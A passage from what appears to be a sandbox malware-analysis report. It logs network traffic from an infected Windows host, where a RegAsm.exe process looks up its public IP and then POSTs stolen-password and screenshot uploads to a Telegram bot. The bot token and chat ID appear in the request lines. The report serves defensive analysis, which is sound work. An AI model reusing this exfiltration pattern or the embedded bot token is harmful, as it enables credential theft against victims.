                                                May 24, 2024 07:45:04.066307068 CEST44349723149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:04.066420078 CEST49723443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:04.066451073 CEST44349723149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:04.412792921 CEST44349723149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:04.413539886 CEST49723443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:04.413613081 CEST44349723149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:04.413676023 CEST49723443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:05.310378075 CEST49724443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:05.310424089 CEST44349724149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:05.315073013 CEST49724443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:05.315253973 CEST49724443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:05.315272093 CEST44349724149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:05.959429979 CEST44349724149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:05.959616899 CEST49724443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:05.975219011 CEST49724443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:05.975264072 CEST44349724149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:05.975640059 CEST44349724149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:05.982634068 CEST49724443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:06.030509949 CEST44349724149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:06.312956095 CEST44349724149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:06.313478947 CEST49724443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:06.313533068 CEST44349724149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:06.313637972 CEST49724443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:06.313661098 CEST44349724149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:06.313803911 CEST49724443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:06.313819885 CEST44349724149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:06.675045967 CEST44349724149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:06.675539017 CEST49724443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:06.675607920 CEST44349724149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:06.675661087 CEST49724443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:16.947494984 CEST49725443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:16.947526932 CEST44349725149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:16.947632074 CEST49725443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:16.947957993 CEST49725443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:16.947973013 CEST44349725149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:17.581306934 CEST44349725149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:17.581403017 CEST49725443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:17.584059954 CEST49725443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:17.584069014 CEST44349725149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:17.584980965 CEST44349725149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:17.586589098 CEST49725443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:17.630521059 CEST44349725149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:17.904057980 CEST44349725149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:17.904475927 CEST49725443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:17.904510975 CEST44349725149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:17.904735088 CEST49725443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:17.904763937 CEST44349725149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:17.904877901 CEST49725443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:17.905107021 CEST44349725149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:18.268871069 CEST44349725149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:18.268950939 CEST44349725149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:18.269128084 CEST49725443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:18.272533894 CEST49725443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:22.047265053 CEST49726443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:22.047302961 CEST44349726149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:22.047369957 CEST49726443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:22.048455954 CEST49726443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:22.048475027 CEST44349726149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:22.694164991 CEST44349726149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:22.696106911 CEST49726443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:22.696124077 CEST44349726149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:23.014787912 CEST44349726149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:23.015530109 CEST49726443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:23.015553951 CEST44349726149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:23.015711069 CEST49726443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:23.015726089 CEST44349726149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:23.015970945 CEST49726443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:23.016067982 CEST44349726149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:23.404891968 CEST44349726149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:23.404973030 CEST44349726149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:23.405010939 CEST49726443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:23.405520916 CEST49726443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:28.794816017 CEST49727443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:28.794856071 CEST44349727149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:28.795228958 CEST49727443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:28.795502901 CEST49727443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:28.795520067 CEST44349727149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:29.414968014 CEST44349727149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:29.469396114 CEST49727443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:30.140361071 CEST49727443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:30.140382051 CEST44349727149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:30.197482109 CEST49727443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:30.197583914 CEST44349727149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:30.197643995 CEST49727443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:30.197850943 CEST49728443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:30.197890997 CEST44349728149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:30.198030949 CEST49728443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:30.198297024 CEST49728443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:30.198307037 CEST44349728149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:30.832114935 CEST44349728149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:30.832329035 CEST49728443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:30.833636045 CEST49728443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:30.833657980 CEST44349728149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:30.833852053 CEST44349728149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:30.835246086 CEST49728443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:30.878496885 CEST44349728149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:31.168849945 CEST44349728149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:31.169173002 CEST49728443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:31.169204950 CEST44349728149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:31.169405937 CEST49728443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:31.169425011 CEST44349728149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:31.169564009 CEST49728443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:31.169580936 CEST44349728149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:31.531258106 CEST44349728149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:31.531831980 CEST49728443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:31.531876087 CEST44349728149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:31.532010078 CEST49728443192.168.2.7149.154.167.220

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                May 24, 2024 07:41:23.909960032 CEST6109253192.168.2.71.1.1.1
                                                May 24, 2024 07:41:23.918042898 CEST53610921.1.1.1192.168.2.7
                                                May 24, 2024 07:41:26.341392994 CEST5129453192.168.2.71.1.1.1
                                                May 24, 2024 07:41:26.350857019 CEST53512941.1.1.1192.168.2.7

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                May 24, 2024 07:41:23.909960032 CEST192.168.2.71.1.1.10xb4d5Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                May 24, 2024 07:41:26.341392994 CEST192.168.2.71.1.1.10x8ba5Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                May 24, 2024 07:41:23.918042898 CEST1.1.1.1192.168.2.70xb4d5No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                May 24, 2024 07:41:23.918042898 CEST1.1.1.1192.168.2.70xb4d5No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                May 24, 2024 07:41:23.918042898 CEST1.1.1.1192.168.2.70xb4d5No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                May 24, 2024 07:41:26.350857019 CEST1.1.1.1192.168.2.70x8ba5No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                HTTP Request Dependency Graph

                                                • api.ipify.org
                                                • api.telegram.org

                                                HTTPS Proxied Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.749699104.26.13.2054436596C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-24 05:41:24 UTC155OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                Host: api.ipify.org
                                                Connection: Keep-Alive
                                                2024-05-24 05:41:24 UTC211INHTTP/1.1 200 OK
                                                Date: Fri, 24 May 2024 05:41:24 GMT
                                                Content-Type: text/plain
                                                Content-Length: 12
                                                Connection: close
                                                Vary: Origin
                                                CF-Cache-Status: DYNAMIC
                                                Server: cloudflare
                                                CF-RAY: 888af4dcca3c423b-EWR
                                                2024-05-24 05:41:24 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 37 35
                                                Data Ascii: 8.46.123.175


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.749700149.154.167.2204436596C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-24 05:41:27 UTC260OUTPOST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dc7b929ff59cb4
                                                Host: api.telegram.org
                                                Content-Length: 980
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-24 05:41:27 UTC25INHTTP/1.1 100 Continue
                                                2024-05-24 05:41:27 UTC980OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 62 39 32 39 66 66 35 39 63 62 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 36 35 35 33 30 32 38 32 37 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 62 39 32 39 66 66 35 39 63 62 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 35 2f 32 34 2f 32 30 32 34 20 30 31 3a 34 31 3a 32 35 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dc7b929ff59cb4Content-Disposition: form-data; name="chat_id"6553028274-----------------------------8dc7b929ff59cb4Content-Disposition: form-data; name="caption"New PW Recovered!Time: 05/24/2024 01:41:25User
                                                2024-05-24 05:41:27 UTC402INHTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 24 May 2024 05:41:27 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                2192.168.2.749707149.154.167.2204436596C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-24 05:43:05 UTC238OUTPOST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dc88931a5d0108
                                                Host: api.telegram.org
                                                Content-Length: 66751
                                                Expect: 100-continue
                                                2024-05-24 05:43:05 UTC25INHTTP/1.1 100 Continue
                                                2024-05-24 05:43:05 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 38 38 39 33 31 61 35 64 30 31 30 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 36 35 35 33 30 32 38 32 37 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 38 38 39 33 31 61 35 64 30 31 30 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 36 2f 30 39 2f 32 30 32 34 20 31 34 3a 33 37 3a 32 38 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dc88931a5d0108Content-Disposition: form-data; name="chat_id"6553028274-----------------------------8dc88931a5d0108Content-Disposition: form-data; name="caption"New SC Recovered!Time: 06/09/2024 14:37:28User
                                                2024-05-24 05:43:05 UTC16355OUTData Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                                Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                                2024-05-24 05:43:05 UTC16355OUTData Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
                                                Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                                2024-05-24 05:43:05 UTC16355OUTData Raw: 31 a8 ff 00 c8 4a eb fe ba bf f3 35 c7 80 fe 23 f4 ff 00 23 5c d7 f8 2b d7 f4 65 7a 28 a2 bd 73 e7 42 8a 28 a0 0e d3 fe 59 e8 df ef 8f fd 12 f4 fb bd 62 ce d3 50 82 ca 57 c4 92 f7 ec be 99 fa d6 7e ad 7b fd 9d a3 e9 b7 61 37 98 ca e0 7b 98 98 0f e7 5c 25 c4 f2 dc ce f3 cc e5 e4 73 96 26 bc 9c 3e 1b db 2b bd 8f a8 c4 62 7d 8b b2 dc f5 92 46 40 cf 26 b3 1f fd 46 b5 fe f1 ff 00 d1 29 5c 7b 6b 17 33 5b da 5c 89 4f da ac 4e 0e 4f 0e 87 bf f4 3e b9 15 d3 58 de a6 a1 a4 ea b7 71 82 ab 21 63 83 d8 88 50 11 f9 8a ce a6 1e 54 a2 db fe b5 34 a7 88 8d 59 24 bf ad 0e 5a 8a 29 6b db 3e 50 4a 28 a2 80 29 ea 7f f1 ee bf ef 8f e4 6b 47 fe 11 eb 69 35 4d 32 28 a4 9b ec b7 70 79 cc cc c3 72 e0 12 79 c6 3d 2b 3b 53 ff 00 8f 75 ff 00 7c 7f 23 5b ba 7e a7 6a be 11 2f 24 f1 8b
                                                Data Ascii: 1J5##\+ez(sB(YbPW~{a7{\%s&>+b}F@&F)\{k3[\ONO>Xq!cPT4Y$Z)k>PJ()kGi5M2(pyry=+;Su|#[~j/$
                                                2024-05-24 05:43:05 UTC15447OUTData Raw: 5c b2 0a 28 a2 b6 39 c2 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 92 96 92 81 85 14 51 40 05 14 51 40 09 45 14 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 60 14 51 45 00 14 51 45 00 25 14 51 40 c2 92 96 92 80 0a 28 a2 81 85 14 51 40 09 45 14 50 01 45 14 50 30 a4 34 bd a9 28 00 a2 8a 28 01 28 a2 8a 06 14 94 b4 94 00 51 45 14 00 94 52 d2 50 30 a2 8a 28 00 a4 a2 8a 63 0a 28 a2 80 12 8a 33 49 9a 06 2d 25 25 14 05 83 3e d4 99 a2 8a 06 14 94 b4 94 00 52 52 d2 50 30 a2 8a 28 18 52 51 45 00 14 94 b4 94 0c 28 a2 8a 00 4a 28 a2 81 88 68 a2 8a 00 29 29 69 28 18 52 52 d2 50 01 49 4b 45 05 09 45 14 94 02 16 92 8a 28 01 0d 14 51 40 c2 92 96 92 81 85 25 14 50 02 51 4b 49 40 c2 92 96 92 81 85 25 14 50 01 49 4b 45 03 12 8a 28 a0 61 49 45 25 00 2d 25 14 50 30
                                                Data Ascii: \(9((((Q@Q@EPEPEP0(`QEQE%Q@(Q@EPEP04(((QERP0(c(3I-%%>RRP0(RQE(J(h))i(RRPIKEE(Q@%PQKI@%PIKE(aIE%-%P0
                                                2024-05-24 05:43:05 UTC1165OUTData Raw: a8 ac 1a 2a 65 15 25 66 44 e0 a6 ac cf 4c d3 75 3b bb 96 da f7 9b 60 41 97 90 ed 07 1e 9b ba fe b5 95 e2 af 13 c1 25 ab d8 58 48 24 32 0c 49 22 f4 03 d0 7a d7 11 45 72 3c 1a 9d 55 52 a3 bd b6 46 d4 a6 e9 53 70 5d 7a 85 14 51 5d c4 05 6b e9 1a a2 c0 9f 67 9c e1 3f 85 bd 3d a9 90 f8 73 57 9e 14 9a 3b 4d d1 c8 a1 94 f9 88 32 0f 23 bd 3f fe 11 7d 6b fe 7c bf f2 2a 7f 8d 29 53 72 56 68 ce 7c 92 56 6c eb f4 cd 52 f2 66 48 62 bb 1e 5f f7 f0 a4 aa fb 31 e4 54 7e 22 f1 45 b5 a5 a3 db 59 4c 26 b9 60 57 72 9c 84 f7 cf 73 5c a7 fc 22 fa d7 fc f9 7f e4 54 ff 00 1a 3f e1 17 d6 bf e7 cb ff 00 22 a7 f8 d7 1c f0 0e ac d4 aa 36 d2 e8 6b 42 aa a3 17 14 f5 7d 4c 7a 2b 48 68 3a a3 00 45 af 07 9f be bf e3 59 f2 c6 f1 4a f1 48 30 e8 4a b0 f4 22 bb 5a 68 49 a6 36 8a 28 a0 61 45
                                                Data Ascii: *e%fDLu;`A%XH$2I"zEr<URFSp]zQ]kg?=sW;M2#?}k|*)SrVh|VlRfHb_1T~"EYL&`Wrs\"T?"6kB}Lz+Hh:EYJH0J"ZhI6(aE
                                                2024-05-24 05:43:05 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 38 38 39 33 31 61 35 64 30 31 30 38 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dc88931a5d0108--
                                                2024-05-24 05:43:05 UTC402INHTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 24 May 2024 05:43:05 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                3192.168.2.749709149.154.167.2204436596C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-24 05:43:20 UTC262OUTPOST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dc90cd1e5e4e83
                                                Host: api.telegram.org
                                                Content-Length: 66751
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-24 05:43:21 UTC25INHTTP/1.1 100 Continue
                                                2024-05-24 05:43:21 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 30 63 64 31 65 35 65 34 65 38 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 36 35 35 33 30 32 38 32 37 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 30 63 64 31 65 35 65 34 65 38 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 36 2f 32 30 2f 32 30 32 34 20 30 31 3a 35 32 3a 35 39 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dc90cd1e5e4e83Content-Disposition: form-data; name="chat_id"6553028274-----------------------------8dc90cd1e5e4e83Content-Disposition: form-data; name="caption"New SC Recovered!Time: 06/20/2024 01:52:59User
                                                2024-05-24 05:43:21 UTC16355OUTData Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                                Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                                2024-05-24 05:43:21 UTC16355OUTData Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
                                                Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
